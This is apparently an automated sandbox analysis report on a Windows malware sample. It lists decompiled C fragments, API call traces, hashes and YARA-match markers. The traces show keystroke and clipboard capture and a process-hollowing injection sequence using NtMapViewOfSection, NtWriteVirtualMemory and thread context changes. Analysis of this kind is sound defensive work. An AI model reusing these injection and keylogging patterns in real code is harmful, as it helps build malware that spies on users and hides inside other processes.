                                  • API ID: Clipboard$V?$allocator@$??0?$basic_string@CloseD@1@@D@2@@std@@D@std@@DataOpenU?$char_traits@
                                  • String ID:
                                  • API String ID: 1727351239-0
                                  • Opcode ID: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                  • Instruction ID: d068d5d9f876e73b388ef04ee2f39e673df6a44b067aa838ba22f5a803aba3f5
                                  • Opcode Fuzzy Hash: d31ff5e3c6f90f495a0499d15105459c1e1ba467a64aad7b936036200359d4d3
                                  • Instruction Fuzzy Hash: 05E03075504615EFE7409B50DC49FDA7BACDB85B52F408035B90ADA280D7749980CAA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 004054FC
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 0040550F
                                  • SetEvent.KERNEL32(?,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405518
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0041B8E8,?,00406CDD,?,?,?,?,?,[End of clipboard text]), ref: 00405527
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@V01@@Y?$basic_string@$??1?$basic_string@Event
                                  • String ID:
                                  • API String ID: 3911305588-0
                                  • Opcode ID: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction ID: de7088bd0e13ff88ad3ed09bf1a5158b73f18205d37a60fa436fa72f9884fc0a
                                  • Opcode Fuzzy Hash: 5e8272a8b6e28889ab6d8654449965f19fbf5b6a96bc948a22fd1af30fd28282
                                  • Instruction Fuzzy Hash: 06F08231400B49EFCB11DF60D848AD77FA8EF05244F448469E48382961D774F588CF98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 46%
                                  			E0040D7C0(void* __eflags) {
                                  				char* _t5;
                                  				void* _t20;
                                  
                                  				_t5 = E0040180C(_t20 - 0x10, __eflags, 0);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				E004126BC(atoi(_t5));
                                  				E004017DD(_t20 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 0040D7CC
                                  • atoi.MSVCRT ref: 0040D7D3
                                    • Part of subcall function 004126BC: OpenProcess.KERNEL32(00000001,00000000,?), ref: 004126C9
                                    • Part of subcall function 004126BC: TerminateProcess.KERNEL32(00000000,00000000), ref: 004126D7
                                    • Part of subcall function 004126BC: CloseHandle.KERNEL32(00000000), ref: 004126E3
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$??1?$basic_string@Process$?c_str@?$basic_string@CloseHandleOpenTerminateatoi
                                  • String ID:
                                  • API String ID: 1377568529-0
                                  • Opcode ID: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                  • Instruction ID: 2746f951d2caaa68166efb6d96d37f5946b4e222a380c15f16ac4a6add4f85c7
                                  • Opcode Fuzzy Hash: 564291607d9638d041430aad6149658f0cca5fd975ad9575967f8846513cae85
                                  • Instruction Fuzzy Hash: 54E0ED72914519CBCB04ABE1EC599ED7324EB90316F50483FE112E60E1EE785555CB1C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 64%
                                  			E0040DCD4() {
                                  				void* _t15;
                                  				intOrPtr _t19;
                                  
                                  				E0040AC8C();
                                  				exit(0);
                                  				while(1) {
                                  					_t19 =  *0x41beb8; // 0x0
                                  					if(_t19 == 0) {
                                  						break;
                                  					}
                                  					Sleep(0x64);
                                  				}
                                  				E00408245();
                                  				E004017DD(_t15 - 0x10);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return 0;
                                  			}

                                  APIs
                                    • Part of subcall function 0040AC8C: TerminateProcess.KERNEL32(00000000,00000000,004085BA), ref: 0040AC9C
                                    • Part of subcall function 0040AC8C: WaitForSingleObject.KERNEL32(000000FF), ref: 0040ACAF
                                  • exit.MSVCRT ref: 0040DCDB
                                  • Sleep.KERNEL32(00000064), ref: 0040DCED
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(0000006B), ref: 0040E6AC
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: ??1?$basic_string@D@2@@std@@D@std@@U?$char_traits@V?$allocator@$ObjectProcessSingleSleepTerminateWaitexit
                                  • String ID:
                                  • API String ID: 772260455-0
                                  • Opcode ID: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction ID: 3edd35d2a09f3996059eabe09ae33406840b09248e651dbbdf397ea46066b4da
                                  • Opcode Fuzzy Hash: 5aace0361de9191413dc271bf8bd4434801403ba898cda7487336363dda204b6
                                  • Instruction Fuzzy Hash: 8DE0E531918619DFE304ABE1ED59BDD7730AB60346F50443AE603A60E1DAF9051ADB1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60( [LCtrl] ,?), ref: 00406B97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$??0?$basic_string@D@1@@D@2@@std@@D@std@@U?$char_traits@
                                  • String ID: [LCtrl] $ [RCtrl]
                                  • API String ID: 4257247948-618823999
                                  • Opcode ID: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction ID: 4f70cad60a3ff704afd3fe8ce3074508994e3182d9d4e745bddae8050266d9bd
                                  • Opcode Fuzzy Hash: 9f16e9fa14077babb8ed9855a1e050faffba71bb071577cb853db8c28f755885
                                  • Instruction Fuzzy Hash: 60E092B17106147FEA14A66DD81BEFF36BCDB80754F40017AE802E72C1D9E96D4086EA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00412881: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BA38,0041BCB0,00000000,0040903C,004140D8,00000000,0000000B), ref: 0041288D
                                    • Part of subcall function 00412881: ??2@YAPAXI@Z.MSVCRT ref: 0041289B
                                    • Part of subcall function 00412881: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128BD
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,00000000,00000001), ref: 0040D8E1
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 0040D8EE
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$??0?$basic_string@?c_str@?$basic_string@D@2@@std@@D@std@@$??1?$basic_string@??2@??3@?length@?$basic_string@ExecuteG@1@@ShellV01@@
                                  • String ID: open
                                  • API String ID: 317973523-2758837156
                                  • Opcode ID: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction ID: 6a6c3e705ca9fa4d3d03dab41846ccb6958ded06a858cdbf50d377e36584e32d
                                  • Opcode Fuzzy Hash: e61f8b88c50d94c6a0b066f9201dc656a53d42202959283a728bccc41aa225e3
                                  • Instruction Fuzzy Hash: 5BE04F71504608EEDB056AB09CC5DFA336CA744345F50056AB006A20D1D9744D454628
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 05791CB7
                                  • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 05791CDC
                                  • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 05791CF6
                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 05791D41
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05791D66
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 05791DA9
                                  • NtTerminateProcess.NTDLL(?,00000000), ref: 05791DB7
                                  • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 05791DC2
                                  • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 05791E36
                                  • NtGetContextThread.NTDLL(?,?), ref: 05791E50
                                  • NtSetContextThread.NTDLL(?,00010007), ref: 05791E74
                                  • NtResumeThread.NTDLL(?,00000000), ref: 05791E86
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.927908575.0000000005790000.00000040.00000001.sdmp, Offset: 05790000, based on PE: false
                                  Similarity
                                  • API ID: Section$ProcessThreadView$ContextCreateMemoryVirtual$InformationQueryReadResumeTerminateUnmapWrite
                                  • String ID:
                                  • API String ID: 3848664822-0
                                  • Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                  • Instruction ID: 388cfd7b001b6650f725ed8c3100e8775b6d1c15a76bb464bd74b8b7a40b488b
                                  • Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                  • Instruction Fuzzy Hash: 3791F371900249AFDF21DFA5DC88EEEBBB8FF89705F404059FA09EA150D731AA54DB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtOpenSection.NTDLL(?,0000000C,?), ref: 05790199
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 057901B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.927908575.0000000005790000.00000040.00000001.sdmp, Offset: 05790000, based on PE: false
                                  Similarity
                                  • API ID: Section$OpenView
                                  • String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
                                  • API String ID: 2380476227-2634024955
                                  • Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                  • Instruction ID: 8006a270f61c0e38e305396819bdc00c257966aefc2571295a45e6cb4dbc8cb8
                                  • Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                  • Instruction Fuzzy Hash: 0B3137B1E10258EFCB14CFE4D889ADEBBB8FF08750F10415AE514EB250E7749A05CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00D79508
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922313384.0000000000D70000.00000040.00000001.sdmp, Offset: 00D70000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 332ddf7ed49765ccff5d7254cf314f8fca335abe8260918fecc7f8a6c6daecf1
                                  • Instruction ID: ab36a7ab55048714f47cec4f65f35aa11105d012562da60230739d22cca038b8
                                  • Opcode Fuzzy Hash: 332ddf7ed49765ccff5d7254cf314f8fca335abe8260918fecc7f8a6c6daecf1
                                  • Instruction Fuzzy Hash: 8B81F231A002049FCB10EBB4C864BAEFBE6EF89314F188569D559DB391EB35DC06C7A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00D79508
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922313384.0000000000D70000.00000040.00000001.sdmp, Offset: 00D70000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: 0169543ee8e733c02d98d5fdb3224214d6afca3ca1ed62a0aca19fe0293018a3
                                  • Instruction ID: 10f02fde28f33b6d20a71bb26b6a3f8b394d86000cb030218c1e99ea7a650e77
                                  • Opcode Fuzzy Hash: 0169543ee8e733c02d98d5fdb3224214d6afca3ca1ed62a0aca19fe0293018a3
                                  • Instruction Fuzzy Hash: E111F8B59002499FCB10DF9AD844BDFFBF4EB48324F148429D529A7310D775A945CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922219018.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a63e3f157eb1dc5732fea22d1bb0c5757bdb92588f07c5cb49382c962811949d
                                  • Instruction ID: 9b78ec17fdbfb2b591e86a807060acbcbff60aa120caa9367574d67e53b3ee24
                                  • Opcode Fuzzy Hash: a63e3f157eb1dc5732fea22d1bb0c5757bdb92588f07c5cb49382c962811949d
                                  • Instruction Fuzzy Hash: 172104B2544204EFDF00DF21D9C0B26BBA5FB84314F24C9B9D9095B346C376D846CAA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922219018.0000000000B9D000.00000040.00000001.sdmp, Offset: 00B9D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 50b0195627c840c770fb90b7c415a8e6202c6b9d5b98d546d24497733f6893e3
                                  • Instruction ID: 870ccb50aff8f8f9f3f2174c52ec347b433ec2ef9da036e2c8eb88d919b5c245
                                  • Opcode Fuzzy Hash: 50b0195627c840c770fb90b7c415a8e6202c6b9d5b98d546d24497733f6893e3
                                  • Instruction Fuzzy Hash: D4119D76544280DFDB01CF20D9C4B15FBB1FB84324F28C6A9D8495B656C33AD84ACBA2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922172746.0000000000B8D000.00000040.00000001.sdmp, Offset: 00B8D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d746466672e97a94905abc9892320d40395f1641d20071c74c2fee94baf34965
                                  • Instruction ID: fab1ca3d5b1931e9cd2be8a4e63188ae6237e3519b1a89d38934e70064acc48e
                                  • Opcode Fuzzy Hash: d746466672e97a94905abc9892320d40395f1641d20071c74c2fee94baf34965
                                  • Instruction Fuzzy Hash: A701F771508344AAD710AB21CCC4B66FBD8EF40324F18819BED044E296C3B99C45C7B2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.922172746.0000000000B8D000.00000040.00000001.sdmp, Offset: 00B8D000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c935a71e704812463bec83857e46f95cfa41655208994c2782b70ef763280f6
                                  • Instruction ID: 1e43f8815e14315bd8578d31a026276b308317c3489cd2d5b2fd4482a081accf
                                  • Opcode Fuzzy Hash: 7c935a71e704812463bec83857e46f95cfa41655208994c2782b70ef763280f6
                                  • Instruction Fuzzy Hash: 25F06271408244AFEB109A16CDC4B62FFE8EB91734F18C56AED085F296D3799C44CBB1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Executed Functions

                                  APIs
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409846
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00409872
                                    • Part of subcall function 00409823: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040987E
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00409887
                                    • Part of subcall function 00409823: malloc.MSVCRT ref: 00409898
                                    • Part of subcall function 00409823: free.MSVCRT(?,?,?,00000000,00408CAD,00000000), ref: 004098E3
                                    • Part of subcall function 00409823: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004098F1
                                    • Part of subcall function 00409823: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004098FA
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041BC80,?,?,00000000), ref: 00408CB7
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00408CC6
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ??0?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAE@PBDH@Z.MSVCP60(licence_code.txt,00000012,00000001,00000000), ref: 00408D31
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000034), ref: 00408D42
                                  • ??6std@@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@0@AAV10@PBD@Z.MSVCP60(?,00000000), ref: 00408D50
                                  • ?close@?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D5E
                                  • ??_D?$basic_ofstream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP60 ref: 00408D6A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00408D73
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,00000000), ref: 00408D8C
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(004140D8,Software\,00000000,0000000E,00415774), ref: 00408DB4
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,0000000E,00415774), ref: 00408DC1
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,0000000E,00415774), ref: 00408DD1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DDA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,0000000E,00415774), ref: 00408DE3
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000032,00000000,?,?,?,?,0000000E,00415774), ref: 00408DF5
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000033,00000000,?,?,?,?,0000000E,00415774), ref: 00408E11
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,004140D8,?,?,?,?,0000000E,00415774), ref: 00408E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00416524,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408E56
                                  • OpenMutexA.KERNEL32 ref: 00408E80
                                  • WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,?,?,0000000E,00415774), ref: 00408E93
                                  • CloseHandle.KERNEL32(004140D8,?,?,?,?,0000000E,00415774), ref: 00408E9C
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,0000000E,00415774), ref: 00408EAD
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(Inj,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408ECC
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000E,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EEF
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408EFA
                                  • CreateMutexA.KERNELBASE(00000000,00000001,00000000,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F04
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F0A
                                  • GetModuleFileNameW.KERNEL32(00000000,0041BA5C,00000104,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F2F
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F61
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F6A
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60( (32 bit),?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408F89
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(0000002E,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FAF
                                  • ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z.MSVCP60(00415F98,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00408FD4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(origmsc,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00408FF2
                                    • Part of subcall function 0040B47F: RegOpenKeyExA.ADVAPI32(00000000,00000000,00000000,00020019,00000000,80000001,?,00407A4E,80000001,00000000), ref: 0040B495
                                    • Part of subcall function 0040B47F: RegQueryValueExA.ADVAPI32(00000000,80000001,00000000,00000000,00000000,00000000,0041BA38,?,00407A4E,80000001,00000000), ref: 0040B4AA
                                    • Part of subcall function 0040B47F: RegCloseKey.ADVAPI32(00000000,?,00407A4E,80000001,00000000), ref: 0040B4B5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000027,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040901A
                                  • ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,0000000B,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00409044
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040904D
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 0040905E
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409079
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000008,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 00409094
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000003,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004090AF
